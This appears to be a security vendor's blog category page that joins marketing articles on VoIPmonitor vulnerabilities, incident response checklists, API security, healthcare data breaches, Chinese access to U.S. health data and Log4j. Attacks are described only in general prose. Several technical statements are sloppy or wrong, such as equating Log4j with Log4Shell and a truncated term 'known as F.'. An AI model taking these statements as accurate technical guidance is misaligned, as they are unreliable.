Category: Cybersecurity

VoIP Monitoring Software’s Critical Security Flaws Discovered

Voip monitoring softwares critical security flaws discovered

 

VoIP Monitoring Software’s Critical Security Flaws Discovered

There’s no question that VoIP (Voice over Internet Protocol) is revolutionizing how businesses communicate, but there are growing pains like all new technologies. One of the significant issues with VoIP is that it can be challenging to detect and diagnose problems. That’s where VoIP monitoring comes in.

VoIP monitoring is the process of keeping track of voice traffic and identifying issues with call quality. VoIPmonitor is a popular monitoring software that allows users to listen to and record VoIP calls. It includes call analysis, quality measurement, and media analysis features. A PENETRATION-TESTING & vulnerability research firm, Kerbit, detected new vulnerabilities in VoIPmonitoring, and issued a warning about the flaws and how hackers could exploit the scenario.

What is VoIPmonitor?

VoIPmonitor is an open-source network packet sniffer for SIP RTP and RTCP VoIP protocols that runs on Linux and allows users to monitor and troubleshoot conversation quality and decode, play, and archive calls in a CDR database.

The software involves the measurement of jitter, latency, and packet loss, all of which impact the quality of a VoIP call. Simply described, it’s the monitoring of VoIP conversations’ quality of service (QoS), which includes both fault and performance management. Monitoring metrics from the source to the destination and vice versa and the mean opinion score (MOS) and round trip time (RTT) will ensure that everything is under control throughout the communication and connection.

What are the flaws identified by Kerbit?

Kerbit detected three vulnerabilities, which are listed below:

  • CVE-2022-24259 (CVSS score: 9.8) – An authentication bypass problem in the GUI’s “cdr.php” component allows an unauthenticated attacker to elevate privileges via an exceptionally crafted request.
  • CVE-2022-24260 (CVSS score: 9.8) – An SQL injection vulnerability exists in the GUI’s “api.php” and “utilities.php” components, allowing attackers to elevate privileges to administrator and retrieve sensitive data.
  • CVE-2022-24262 (CVSS score 7.8) – A remote command execution via the GUI’s configuration restore capabilities due to a missing check for archive file types, which allows a bad actor to execute arbitrary instructions via a forged file.

The vulnerability allows users to upload any file extension they want and can get them to run, essentially giving hackers admin privileges. The flaws could have been used to crash applications, but bulk-uploading extensions and overwhelming the network.

Unauthenticated attackers could elevate privileges to the administrator level and execute arbitrary commands if critical security vulnerabilities in VoIPmonitor software are successfully exploited.voip monitoring

Other Types of VOIP Attacks?

VoIP technology is just as reliable and secure as a traditional telephone, if not more so than a cellular connection. Every network must be appropriately set up and fortified to be completely hacker-proof.

Most VoIP cyber assaults are caused by administrators failing to implement adequate security measures, resulting in VoIP security attacks and, in particular, SIP hacking. SIP servers, after all, are at the heart of both internal IP telephony and commercial services, as seen in the diagram:

It’s vital to keep your SIP servers safe. The following are four types of SIP-based VoIP hacks that have gained popularity in the telecom business in recent years:

  1. SIP Amplification Attack – DDoS
    As this protocol has become widely employed in VoIP systems, SIP hacking remains one of the most prevalent security concerns in the telecom space. The following is a typical scenario for a SIP amplification attack:
    A hacker uses DDoS to launch a mass application layer attack on the SIP protocol to disrupt it. For example, an attacker might compromise SIP servers and send many (10+) faults to the victim, allowing them to send IP Spoofed packets and repeated Responses.
  2. SIP Trust Relationships Hack
    SIP gateways rely on SIP Trunks for call initiation and CDR/invoice management, making them easy targets for VoIP attacks. SIP trunks frequently lack passwords or employ IP-based filters for trunk authentication. Most SIP trunks also have Direct INVITE privilege without REGISTER, making them vulnerable to assaults.
  3. SIP Authentication Hack

SIP 2.0 uses the MD5 message-digest technique to hash the UAC password to offer extra security to VoIP networks.
The issue with such an authentication method is that it isn’t completely safe. When UAC requests authentication from a UAS, the latter generates and sends a digest challenge to the UAC. The most basic authentication challenge consists of the following:

  • a Realm – required to identify credentials within a SIP message.
  • a Nonce – a unique MD5 string produced by the UAC for each registration request; A Nonce has a timestamp and a secret, a non-reusable phrase that ensures it has a finite lifespan.

On the other hand, Hashed passwords are no longer sufficient to defend VoIP systems from sophisticated authentication assaults. With a Network Analyzer or a brute-force attack, hackers may now crack MD5 cash and gain access to a SIP authentication header.

  1. Creating a Fake Caller ID/ Spoofing

In SIP, caller ID isn’t adequately protected, and hackers have lots of tools for spoofing the SIP INVITE Request Message from the header. This is a prevalent method of voice fraud used to attack PBX systems. As a result, you must also protect that endpoint to avoid roaming fraud or call hijacking.

What can we do?

By including VoIP in your portfolio, you may improve your commercial offering by having IP-based voice features that bring value to both data and video. It also allows you to compete with over-the-top (OTT) service providers who cannot guarantee service quality (QoS). After all, quality and security are the fundamental differentials that customers are most likely to notice regarding voice service. Delivering faultless VoIP call quality involves real-time customer experience management, including total visibility of the traffic running through your IP network.

The VoIP monitoring market is heating up as businesses search for the right solution that fits their needs. Companies are always concerned about security when giving their staff or contractors unfettered access to internet and phone services in remote environments because of the inherent risk of not being in a secure network. However, many remote users still want access to secure phone and internet lines to stay connected without worrying about data costs.

Protected Phones by Protected Harbor is a cloud-based unified VoIP solution that provides businesses with the security and flexibility they need to enable remote work and 24×7 live support with a dedicated system. To learn more about our solution and how we can partner with you, please visit our website or contact us today.

What is an Incident Response Plan (IRP) Checklist?

incident response plan

 

What is an Incident Response Plan (IRP) Checklist?

An Incident Response Plan is your best bet for protecting your company from the consequences of a data breach. The time to plan and prepare for security crises is NOW, whatever they may be, long before they occur.

What is an Incident Response Plan?

A cybersecurity incident response plan (IR plan) is a set of guidelines designed to assist businesses in preparing for, detecting, responding to, and recovering from network security problems. Most IR strategies are tech-focused, addressing concerns like malware detection, data theft, and service disruptions. However, any sizeable cyber assault can have a wide-ranging impact on a firm; therefore, the plan should include finance, customer service, HR, employee communications, legal, and other outside entities.

Why is Incident Response Plan Important?

An Incident Response Plan is important because it defines how to reduce the length and severity of security incidents and identify stakeholders, streamline digital forensics, enhance recovery time, and prevent unfavorable publicity and customer attrition.

Small cybersecurity mishaps, such as malware infection, can quickly escalate into more significant issues, resulting in data breaches, data loss, and company interruption.

A good incident response procedure will help your company reduce damages, patch exploitable vulnerabilities, restore affected systems and processes, and close the attack vector.

Incident response is essential for preventing future occurrences and maintaining a company that handles sensitive data like PII, PHI, or biometrics.

IRP Audit

Before writing your Incident Response Plan, you should conduct a security audit of your company. This will help you identify weak areas. You should also identify who is responsible for the incident and determine who will handle the incident. In addition, you should define the parties involved and who will handle it.

Creating an IRP should include several key stakeholders, such as representatives from different company areas, including outside PR. In addition to the team members, it should also include the CEO, board members, and PR representatives. The process should be transparent and approved by key stakeholders easy to implement, but it should not be overly complex. It must be simple to understand, and it should be based on a multi-tiered approach.

How to create an Incident Response Plan & Checklist?

Create an Incident Response Plan

  • The first and most important step in incident response planning is preparation. It should include defining the roles of the IR team and creating an underlying security policy. The security policy should identify the locations and relative value of sensitive data, as well as how many IT resources your company needs to respond to an attack. Make sure that your executives are on board with the plan before it goes live.
  • The second step in creating an Incident Response Plan (IRP) is testing. It is critical to test the IRP to ensure that all components are working correctly. The purpose of testing is to determine whether the plan is effective and whether the team can handle the incident effectively. The IRP must be supported by upper management. The plan must be able to prevent or mitigate a security breach. It must be easy to implement, and it should be quick to execute.
  • The final step in creating an Incident Response Plan is to define the response, the incident, or the event that will trigger it. There are many types of incidents, and different responses must be developed for each. Your IRP should identify the kind of security incident likely to occur and identify responsible parties. In addition, you should include a comprehensive communication plan, including the methods and frequency of communication with the affected parties.

Creating an incident response plan checklist can help your staff cope with a significant incident. IR Plan checklist is made keeping in mind what should be done after an incident.

Post-Incident– The ultimate step of an incident response plan is to create a post-incident investigation checklist. This checklist should include various information, such as disk images, logs, and network traffic reports. It should also detail key elements, including entry point, root cause analysis, and organizational resources targeted in the aftermath of an incident. After the investigation is complete, the team should recommend changes to prevent the same occurrence from occurring again.

Recovery– A recovery phase focuses on bringing systems back to normal operation. The response team must notify affected parties of the nature and extent of the attack within a specified period, such as 72 hours for GDPR. Once the system has been returned to production, the team needs to perform necessary tests, validate that it is operating normally, and document the process. The entire process should take a minimum of a day, depending on the size of the IT network and the business operation.

The recovery phase involves bringing affected systems back to production and testing them regularly. A well-developed plan should include these processes. The more specific they are, the better your plan will be. The more thorough and comprehensive your plan is, the more effective it will be.

Conclusion

The purpose of our cyber incident response plan checklist is to assist your IT security team in developing a complete, coordinated, repeatable, and effective incident response strategy.

Please remember that creating a cybersecurity incident response plan is never a one-time task. Unfortunately, enterprises and their IT security teams may find themselves outmaneuvered by hackers who pivot in their attack strategies/TTP and malware choice if they do not engage in frequent incident response training and IR exercises, including real cyber assault scenarios.

This article should provide you with the information and resources you need to design and implement a successful incident response plan. Partner with Protected Harbor to add best-in-class behavioral analysis to all of your essential data repositories and infrastructure to ensure your data is safe.

At Protected Harbor, we work with individual customers on an Incident Response Plan (IRP) and help them perform an audit to determine where they are today within their IRP. We follow the Critical Controls and guide our customers that match their Incident Response Plan with the specific controls. This provides them with the ability to have a real improvement plan in place.

With that being said, don’t miss out on other crucial aspects of data protection that can be included in your checklist—things like protected data center, disaster recovery plan, backups, testing, and so on. Contact us to create an IRP which is best for you.

What is API security, and why does it matter?

api security

 

What is API security, and why does it matter?

The process of preventing or mitigating attacks on APIs is known as F. APIs serve as the foundation for mobile and web apps. As a result, it’s vital to safeguard the sensitive information they send.

An API is a software interface that determines how different pieces of software interact with one another. It regulates the kind of requests between programs, how they are made, and what data formats are utilized. APIs are being used in the Internet of Things (IoT) and website applications. They frequently collect and process data or allow the user to submit data processed within the API’s context.

Google Maps, for example, is powered by an API. Google Maps can be embedded into a page by a web designer. When users use Google Maps, they are just using a prewritten API given by Google, rather than code that the web designer built piece by piece. API security includes both your APIs and those you use indirectly.

Web API security entails user and program authentication to secure sensitive data and prevent malicious conduct. Web API security is critical to the success of web applications and for safe communication in your company. This article walks you through the procedures to secure the security of your APIs.

Types of API Security

API security has grown increasingly critical, especially with the rise of IoT. Users, APIs, and the apps and systems they interact with exchange critical and sensitive data. Hackers can use an insecure API to get access to a computer or network that is otherwise secure. Let’s take a look at commonly used API security types.

API Gateway Security

api security

An API Gateway is a critical component of an API security architecture because it acts as a focused server that regulates traffic. This functionality can also detect potential vulnerabilities, potentially exposing your APIs.

The process of defining API security involves four steps. The first step is to determine the security goals. Next, you need to identify testable implementation constraints and complete the verification. During this step, you need to ensure that the security measures are sufficient to protect your API from threats. The third step involves identifying new assets and goals. And the fourth step is the security strategy to implement the controls that will protect your API.

When you develop a sample API, incorporate security controls into the code. These controls will prevent unauthorized users from modifying or intercepting the messages. Another step is to enforce the security policy in your API. You should use application-level security measures and check your code for vulnerabilities. For example, use OAuth to protect your API against external attackers. However, this is not enough. It’s imperative to follow data privacy regulations.

Restful API security

REST APIs support HTTP and Transport Layer Security (TLS) encryption. TLS is an internet security standard that verifies that data delivered between two systems (a server and a server, or a server and a client) is encrypted and unaltered. This means that a hacker attempting to steal your credit card information from a shopping website will be unable to view or modify your information. If a website’s URL starts with “HTTPS,” you know it’s secured with TLS (HyperText Transfer Protocol Secure).

REST APIs also use JavaScript Object Notation (JSON), a file format that makes data movement between web browsers easier. REST APIs don’t need to keep or repackage data because they use HTTP and JSON, making them much faster than other APIs.

Web Application Security

Web application security is the practice of defending websites and online services from various security risks that take advantage of flaws in the application’s code. Content management systems (e.g., WordPress), database administration tools (e.g., phpMyAdmin), and SaaS apps are common targets for online application assaults.

Organizations that fail to safeguard their web applications are vulnerable to attack. This can lead to data theft, strained client relationships, canceled licenses, and legal action, among other things.

Why does API security matter for businesses?

Many organizations use APIs, but do they adhere to API security best practices? If not, this may be one of the most overlooked security risks. These services are not limited in the number of resources they allow, which opens up the door to brute force attacks. Additionally, APIs can expose users’ sensitive information to attackers who take advantage of weak authentication processes. It usually takes 200 days before a company becomes aware of a breach – and it usually takes an external party to discover it.

Developing API security is an important step in securing your application. This requires you to adhere to best coding practices and implement proper security practices. Some common vulnerabilities make your system prone to attacks, such as user-level authentication, weak encryption, storing critical secrets on disk, and not applying security updates and patches. So, it is vital to protect your business against these problems.

In addition to good coding practices, API security can also be compromised if a user uses unsecured public Wi-Fi, as these networks are the perfect environment for hackers. The security of your API depends on how you secure it, so be sure to use a secure VPN to prevent such problems. If you are using public Wi-Fi, your software must have a VPN for security.

Why is API important?

It is vital to protect your business against security issues. There are several ways to do this. For example, you should check your APIs periodically to ensure that they are secured against malicious code. You can test the security of your APIs with a tool like Sqreen. These tools are free and can be used by any business. A security expert can recommend the best practices to secure your APIs. If you don’t want to worry about security, use a security tool to protect your application.

In addition to keeping the data of your customers safe, APIs also help companies protect themselves from identity theft. There are many different types of attacks that can target an API, and each one has its own unique set of risks. For example, two-factor authentication is the best way to protect your APIs. It can prevent unauthorized transactions and can also prevent bots. Then, it would help if you used a security solution that protects your business.

The key to protecting your APIs is a comprehensive security strategy. Your security team should consider your business’s API access. It should be able to handle unauthorized access and protect sensitive data. It’s essential to know how APIs work. You can also implement a firewall by integrating the security solution into the API.

How to implement API security?

To protect your APIs, you need to consider all possible threats. Your APIs should be protected against attacks that might be malicious. By doing this, you’re preventing the attackers from using sensitive data. Moreover, it’s essential to encrypt your APIs as they may become vulnerable to attack from external sources. You need to ensure that every API you offer is encrypted and password-protected so that there’s no way for hackers to access them.

Verification
To secure your API from ill-usage, you need to validate users’ identities. You can verify user identity by using a unique API key. To prevent this, you can also verify their identity through the server. To prevent DNS, routing, or IP spoofing, you must implement an authentication protocol to avoid possible attacks. The best way to ensure this is to integrate authentication into your API security framework. If you do not, it’s impossible to guarantee your API will be secure.

Authentication
It is essential to the security of your API. Authentication ensures that your APIs are only accessible to people with the proper credentials. By ensuring that only trusted users can access your data, you can increase the trust of your APIs. This is important for several reasons. For one thing, authentication keeps unauthorized users from damaging your data. And when the user wants to change the API, they need to verify that the user is indeed you.

Limit Access
A good API security policy is not just a matter of setting limits. It also ensures that the APIs are secure. An attacker will not be able to get access to sensitive data if they are not logged in. A good security plan will prevent this from happening. It will also protect your APIs from brute force attacks. It would help if you did not allow people to access your stored data. Object-level authentication will ensure that your users are authenticated.

Conclusion

APIs are expected to become the leading attack vector shortly because they are an attractive target to attackers.

Taking proactive actions to safeguard your API design is the only method to protect your API from attackers.

Following an API Security checklist, such as the one outlined in this post, is the best method. You can also partner with one of the leading security services providers, and they can take care of this for you.

Protected Harbor secures your business using OWASP and similar resources, making sure you’re safe from the most common vulnerabilities at all times. Protected Harbor partners with the clients understanding their requirements and then successfully implementing the ways you might need to safeguard your API against common threats. There’s still a lot to learn about API security, but this is a fantastic place to start. Secure yourself today.

API Security Checklist

A checklist to help you plan and carry out your testing strategy:

  • Create a separate test environment for your API whenever possible so you can test without breaking production.
  • Create functional tests for the happy path first, then automate them with your preferred toolchain.
  • Using the same tools, create negative tests for edge scenarios that lead to security concerns. Begin with testing authentication as a first quick victory.
  • Create detailed documentation for all access control techniques, such as roles, in your APIs. Create test users with a variety of permissions and access to secret resources. Then create test scenarios in which these users try to access unlawful resources. Keep in mind that authorization is just as necessary as authentication!
  • Don’t think of your API as if it were a black box. Discover the kind of issues that your back-end architecture is susceptible to (such as mass assignments, SQL injections, etc.).
  • Create test cases with input exceeding boundaries. Additional attributes, going outside established constraints, and command or SQL injections are all examples (if necessary).
  • Keep an eye on all error responses for signs of internal information leakage.
  • Include security tests in the performance testing process to guarantee that any unusual behavior under stress does not compromise security.

What causes healthcare data breaches the most frequently?

What is the most common cause of healthcare data breaches?

Patient’s medical records are a goldmine for malicious hackers—if they can get their hands on them. According to Cisco Internet Security Threat Report, healthcare is currently the most targeted industry by cybercriminals.

Health data breaches have been on the headlines for a while now. From the crippling breach of Anthem to the compromising of 10 million patient records at UCLA Health — nothing is sacred when it comes to cyberattacks these days. While the impact of security incidents might differ depending on their magnitude, it seems that poorly protected IT systems and hacking/IT incidents are often the biggest culprits in causing privacy and financial setbacks.

Healthcare data breaches are on the rise. Although many are concerned with hacking, several factors could potentially cause a significant healthcare data breach.

Common causes of healthcare data breaches!

Data breaches are becoming more and more common. With the rise of hacking, phishing, malware attacks, and new security regulations, all healthcare organizations need to stay proactive in protecting their data.

The most common cause of data breaches for healthcare organizations is malicious or cyber-criminal attacks. Data breaches can come from various sources, including hackers stealing protected health information (PHI) from an organization’s database, unencrypted devices, or a weak, stolen password. One of the biggest causes of healthcare data breaches is misconfigured medical devices and office equipment. Medical device security remains a major concern for organizations. Click here to know how do breaches happen and how to prevent them?

Hacking/ IT Incidents accounts for 47% of healthcare data breaches making it the #1 cause of healthcare data breaches.
(Source: Electronic Health Reporter)

hacking bar ratioPatient Data Theft: High risk
Health care industry members are all too familiar with data theft and new methods of exfiltrating information from connected medical devices such as electronic medical records (EMRs) and protected health information (PHIs). IP-enabled medical devices can be easily exploited by experienced hackers because of minimal access controls and known vulnerabilities. A hacker may then take data directly from the medical device, but since medical devices typically contain limited data, he is more likely to go to servers, data centers, or other devices on the network, like the XP workstation that is connected to the electronic medical record. Data breaches in healthcare are defined as theft and loss 32% of the time, compared to only 15% in different industries, 2nd to Hacking and IT incidents, as per Healthcare drive. With the number of high-profile breaches in healthcare over the past three years, healthcare organizations need tighter controls to mitigate this risk.

 

What is the cost to your company?

According to IBM’s Cost of Data Breach Report 2021:

  • Healthcare organizations spent an average of $161 per breached record in 2021, which is expected to increase in the future.
  • On average, it takes 329 days to identify a breach.

The reports show that the cost of data breaches has risen once again, reaching a record high since IBM first published the report 17 years ago. The average cost of a data breach increased by 10% year over year, to $4.24 million per incident and that of healthcare data breaches increased by $2 million to $9.42 million per incident in 2021. The average cost of ransomware attacks was $4.62 million per incident.

How can you avoid a data breach?

  • Back up data– Having a proper backup schedule and implementing a secure process to access the off-site data is a preliminary requirement. Confirm that your backup/recovery partner is also HIPAA compliant. Cloud hosting solutions can also be considered for better security.
  • Two factor authentication- Multi-factor authentication, also known as 2FA, is a simple concept that can be implemented by companies easily. A key benefit of two-factor verification lies in its very name: it requires two variables to access an account, just as you need two keys to enter a house. The security is therefore twice as strong.
  • Safeguard data and devices- Ensure that the tools and policies for security are implemented, securing all the devices accessing your network. Remote monitoring for unauthorized access and unusual activity can opt. Limit and set proper data control and access for the devices.
  • Train and educate staff– create a policy for regular security training and practice sessions. Identifying phishing emails, ensuring password complexity, and adhering to anti-malware protocols should be a part of this training. More details

To wrap things up!

Security and compliance are among the top factors healthcare organizations consider when adopting new technologies. Many organizations didn’t or were not able to take the time to strategically align new cloud-based tools and platforms with existing security standards as they transitioned to remote work after the pandemic.
Security and privacy should be a priority when working with technology partners in healthcare. It is a trusted partner’s responsibility to ensure users’ privacy and security, having incorporated a variety of safeguards into their processes, designs, and code, as well as constructing the infrastructure to ensure careful protection of user information. Cisco, Greenway, GE Healthcare, and Protected Harbor are some of the most trusted and reliable healthcare IT solution providers who take pride in their experience of delivering solutions to healthcare and other organizations.

What is a data breach? How to prevent one?

What is a data breach How to prevent one

What is a data breach? How to prevent one?

Data breach has become more common every year. According to the Identity Theft Resource Center (ITRC) data breach 2021 report there were over 1291 data breaches that exposed more than 7 billion records last year. Data breaches can harm your company’s reputation, bringing production to a halt, and even cause enough financial harm to send your company under. In this article, we will review what is data breach and how to stop one?

What is a data breach?

A data breach is a cyber-attack where unauthorized individuals gain access to sensitive personal or confidential information. When a security breach occurs, the hacker can steal and misuse personally identifiable information (PII) such as social security numbers, credit card details, bank account numbers, and even your protected health information (PHI) that could be used for fraudulent activity. A data breach on an organization leads to the release of client information or internal content, moreover, it can be intentional (theft, sabotage) or unintentional (internal error).

Among the data breaches, this year, the manufacturing and utilities sectors were deeply affected, accounting for 48 breaches and 48,294,629 victims. The healthcare sector was second, with 78 compromises and more than 7 million victims. In addition, financial services, government, and professional services each sustained more than 1.5 million victims.

Security magazine’s top data breaches list for 2021:data breach

  • Brazilian Database — 223 million, January
  • Bykea — 400 million, January
  • Facebook — 553 million, August
  • LinkedIn — 700 million, June
  • Cognyte — 5 billion, June
  • Other notable breaches: Ubiquiti, Clubhouse, USCellular, Twitch, T-Mobile, Panasonic, GoDaddy

How do breaches happen?

Data breaches come in many forms. In the case of Asian delivery and rental company Bykea, it was a lack of server encryption. A flaw in Facebook’s address book contacts import feature was their undoing. Cognyte let an unsecured database get indexed, Twitch got hit due to a bad server configuration, and for T-Mobile, it was weak access control points.

Missing Security Patches –  Security tools can become outdated quickly and updates are needed to stop new threats. It’s not just antivirus software that needs patching, many network-level vulnerabilities are caused by unpatched Cisco, Microsoft, and Apache applications.

Unencrypted Data – It is simply plaintext or unaltered data that can be accessed by anyone. This can be sensitive information stored online on cloud servers with no layers of protection. By using encryption, you can prevent brute force attacks and cyberattacks, such as malware and ransomware. Using encryption, data is protected while being transmitted in the cloud or on a computer system.

Phishing – This is the most common hacking technique, that can trick an employee into clicking on a link or opening an attachment. Phishing attacks are used by hackers to gain direct access to a target’s email, social media, or other accounts or to change or compromise connected systems, such as point-of-sale machines and order processing systems.

Spyware – This is a type of malware that tracks your activity until a hacker has what they need to strike. Employee’s don’t even have to download an infected file to get tagged with spyware,

Worms – This is a type of malware hackers install onto a system’s memory. Once installed, worms infect your entire system, stealing data directly, changing system files, or opening a backdoor for hackers to control later on.

Virus – This relies on an employee activating the infected file themselves. The majority of viruses are downloaded from shady websites, usually by people who have no idea what they’re doing. This is another example in support of employee cybersecurity education.

Trojan horses – Attacks of this type pretend to be another program. If you attempt to pirate software or download it from an untrustworthy source, it will often come packaged with a trojan horse. After you’ve installed your program, it often works as it should, but at the same time, a trojan horse is collecting your data or controlling your PC in the background.

Ransomware– The most obvious and dangerous type of malware is ransomware. Viruses, worms, and trojan horses make it onto the computer, and it then annihilates it. To unlock the victim’s system, hackers force them to pay a ransom, often in bitcoin. Victims of cyber-attacks have in some cases paid millions of dollars to get back access to their networks.

How to prevent a data breach?

A data breach is a threat to every organization. It can happen to anyone, from the smallest e-commerce company to the largest bank. Although it’s on the rise, It can be avoided if you know how.

The first step is to stop thinking about your data as “yours” and start thinking of it as “theirs.” The security of your data is no longer just about what you can do to protect it; now, it’s also about what others can do to steal it. It’s not enough to secure your own network. You must also take steps to secure the networks and computer systems of those who connect to yours. Below are the best practices to follow to prevent data breaches:

  1. Educate and train your employees- Employees might be a weak link in the data security chain, and of-course human being human, open suspicious emails every day. A proper training and awareness plan would minimize the chances. As part of this effort, you can teach them how to create strong passwords, how often passwords should be changed, and how to identify, avoid, and report phishing scams.
  2. Create procedures and update software regularly- It’s wise to create data security procedures and update them consistently. Install patches, application software, and operating systems whenever available. Performing regular security audits reveals data integrity and serves as a data protection checklist. Also, perform regular vulnerability checks. Businesses must include in their vulnerability assessments all aspects, from data storage to remote access for employees to Bring Your Own Device (BYOD) strategy as well as policies and procedures.
  3. Data backup, recovery, and remote monitoring- It’s utterly important to have your data backed up because sometimes data breaches can delete your data. Your IT team should have a 24×7 remote monitoring of your network and an automated remote backup system in place. You can work with an MSP if you don’t have a dedicated IT team.
  4. Encrypt data- To maintain the confidentiality of your data while using email or other services, make sure that they are encrypted before they are being sent. Ensure your team has a dedicated Wi-Fi network that the public cannot access. The most sensitive data may need to be restricted from Wi-Fi use since it may allow cybercriminals to intercept it.
  5. Data protection regulations compliance- Organizations must adhere to the regulations and compliances to manage data privacy and people’s data. Companies that store, process, or transmit credit card information must abide by the PCI DSS to safeguard sensitive PII such as credit card numbers. The HIPAA regulations govern who can view and use protected health information, such as the name and Social Security number of patients.
  6. Developing data breach response plan- Even though many companies haven’t developed response plans for breaches yet, such a framework has an important role to play in dealing with cybersecurity incidents, limiting damages, and rebuilding trust among employees and the public. To do this, you need to clearly define the roles and responsibilities of those tasked with handling breaches. A summary of the investigation process should also be included. Additionally, consider multi-factor authentication and encryption as methods of protecting your data.

To wrap things up

A data breach can happen to anyone and when it does, it’s not just your business that is affected. It’s your customers, employees, and brand. To mitigate the risks of a data breach by implementing a strategy that fits your organization’s needs it is important to invest in full-proof security and follow the best practices. Data breach response plans and the security infrastructure vary from organization to organization.

But you don’t have to go it alone. Partnering with a data security and managed IT services provider who understands your business and application needs can help set you up for success. Cisco, Symantec, Transunion, Protenus, and Protected Harbor are some of the top data breach solution providers. With the growing number of data breaches, it’s imperative to have an effective solution in place, so don’t waste any more time, get protected today.

China eyeing U.S. healthcare data

china eyes on us healthcare data

 

China eyeing U.S. healthcare data

Do you want your PHI (protected health information) or DNA going to an authoritarian regime that has a history of using DNA for repression and surveillance? People’s Republic of China (PRC) has collected large sets of data from U.S. over the years, through every means possible. Access to American healthcare data now poses a serious risk to the privacy, economy, and national security of the United States.

The Covid-19 outbreak is only one part of the healthcare pandemic the country is suffering. The sudden dent in the healthcare infrastructure left the companies and the government reeling. As COVID rates and testing have requirements spiked, China’s BGI (Beijing Genomics Institute) Group, the world’s largest biotech and healthcare analytics company, proposed to help build and run advanced COVID testing labs throughout the U.S.  BGI would provide technical expertise, high throughput sequencers, and even make financial donations for more research.

With America struggling to set up enough testing and research facilities, China’s proposal was hard to ignore in times of such desperation. That is until the U.S. National Counterintelligence and Security Center raised suspicion and warned against it.
“access to U.S. healthcare and genomic data by China poses serious national security and privacy risk for the United States.” The NCSC said in a statement. Apparently, the Chinese biotech group supplying the COVID-19 testing kits and helping to set up more than 18 research labs also planned on using samples to obtain healthcare data on American citizens, such as DNA and PHI.

 

China’s access to U.S. healthcare data

The People’s Republic of China (PRC) has been looking to obtain America’s ethnically diverse health data for years. According to National Counterintelligence and Security Center (NCSC), they have been able to gain access to US healthcare data, including genomic data, through a variety of channels, both legal and illegal, including theft of research and cyberattacks.”

According to a report by CFR (Council of Foreign Relations), China already has more data on the genetic sequencing of the US population than the United States has on its own population.
Chinese companies invested in U.S. firms that handle sensitive personal and healthcare data, providing them with easy access to this US Electronic Health Records (EHR). For example, BGI purchased U.S. genomic sequencing company Complete Genomics in 2013, and China’s Wuxi Pharma acquired NextCODE Health in the U.S. and later formed Wuxi NextCODE Genomics.

Recent healthcare data breaches from hackers in China within the PRC government include the theft of personal data and EMRs. Anthem Inc. in 2015 lost healthcare data on roughly 78 million people; information including health identification numbers, names, Social Security numbers, employment, and income information. Two individuals based in China were indicted by the U.S. Justice Department for hacking Anthem and three other U.S. companies, in 2019.

 

The China Challenge

Bill Evania, a veteran of both the CIA and the FBI, also suspected that offer of help from BGI was a modern-day trojan horse. Using the labs as a way to establish a foothold in the U.S. healthcare market, much like previous corporate acquisitions, and then mining the health data even US Government agencies can’t access. Further, all Chinese companies are obligated to share data collected with the PRC government under the PRC’s national security laws. So any Chinese healthcare company on U.S. soil poses a national security risk.

We have seen the consequences in the past. The U.S. Department of Commerce sanctioned two subsidiaries of China’s BGI in July 2020 over the PRC government’s use of genetic techniques to repress Uyghurs and other Muslim minority groups in Xinjiang.

But how has this happened? China has taken the advantage of the loose safety and security infrastructure protecting our PHI and EMR. Policies need to be revamped concerning the sharing and control of these data at the national and international levels.

China’s BGI has collaborated with many American healthcare and research entities over the past decade, providing them with genomic sequencing services, as well as gaining access to health records and genetic information of U.S. citizens. But to date there are not enough regulations and policies to stop internal employees to share such information with other company employees, who just happen to also work for the Chinese government.

 

Conclusion and Diagnosis

“We have a short term approach to data management, solve the problem today, but that often leads to larger problems down the road.”                                – Richard Luna, CEO, Protected Harbor

To address the ever-growing surveillance capabilities of China and other authoritarian states, the U.S. and other nations should take bold action instead of timid, gentle steps. To begin with, the government needs to strengthen healthcare privacy legislation and regulation. Enhanced privacy laws would provide protections against only for foreign states, but also from domestic governments and private parties wishing access to protected healthcare data.

National healthcare IT organizations should also increase user safety and privacy, encryption, reporting, auditing, to enhance data transfer and internet openness. Since electronic health records (EHR) are now the norm, every healthcare organization must be sensitive to the intersection of health information, security, and must adhere to HIPAA compliances. HIPAA Security Rule involves many physical safeguards, technological measures, and organizational standards. It applies to technology in three key ways: technologies that store PHI must log out after a certain time to prevent unauthorized access, all users must be assigned unique logins that can be audited, and, PHI must be encrypted.

No healthcare IT department is alone in the battle to protect against illegal or legal healthcare data breaches. Partnering with reliable and secured healthcare IT solution expert such as Protected Harbor can help solve the issues at a grassroots level. With two organizations working together, the healthcare data industry can lay multiple pillars of healthcare data infrastructure to strengthen national security. We cannot accept our information as safe as is, given the scope of data collection on devices and China’s known involvement in this area. There are no checks and balances in the sharing of data. For example, a company allows the vendors access to the billing data to generate reports. But the vendor has access to ALL of the data, not just what’s needed to generate reporting. The IT department and cybersecurity U.S. needs to be heavily vested in the security and safety of data.

The U.S. has spent the last decade creating interoperable healthcare systems and China is now using legitimate interconnected companies to capture data. As a result of the COVID-19 outbreak, different technologies and data have been linked at a faster rate than security measures applied to the data. Millions of Americans have lost their DNA and personal information, allowing China to leverage our health information to develop artificial intelligence and precision medicine, putting America’s $100 billion biotechnology industry at a disadvantage. We need to cut the oxygen and this starts from the ground level moving up the ladder to the national level.

Log4j vulnerability puts the internet at risk.

Logic vulnerability puts the internet at risk

 

Log4j vulnerability puts the internet at risk.

Various cybersecurity organizations around the globe reported about the discovery of critical vulnerability of Apache Log4j library. The reports of attacks exploiting this vulnerability are already on the internet. Some researchers say this could be one of the worst attacks of all time, so how bad is the risk, and what needs to be done now?

Highlights

  • Log4j is an open-source Apache logging framework used by developers to record activities within an application.
  • Log4j’s security vulnerability allows hackers to execute remote commands on a target system, putting countless services at risk of an attack by hackers.
  • Researchers rated this critical java-based library vulnerability 10 out of 10 in CVSS (Common Vulnerability Scoring System).
  • Amazon, Cisco, Apple iCloud, Twitter, Red Hat, Steam, Tesla, and more software companies and services use the Log4j library.

What is Log4j, and Why you’re at risk?

Log4j or Log4shell is a Java-based logging utility, one of several java logging frameworks developed by Apache software foundation. Any modern-day software you use keeps track of errors and other events in the form of logs. Instead of creating a logging system for storing records and additional information, the Log4j shell comes in handy for the developers as it’s an open-source platform. That’s why the Log4j library is a widely used and most popular logging package.

Hackers can take control of any software using Log4j, exploiting the newfound vulnerability, to run malicious code against the network firewall by forcing it to store a log entry. Hackers are in action looking for the systems which might be vulnerable. The attackers have already developed automated attacking tools that exploit the bugs and worms present on the system. And if the conditions are adequate, these can act independently and spread to more systems and servers.

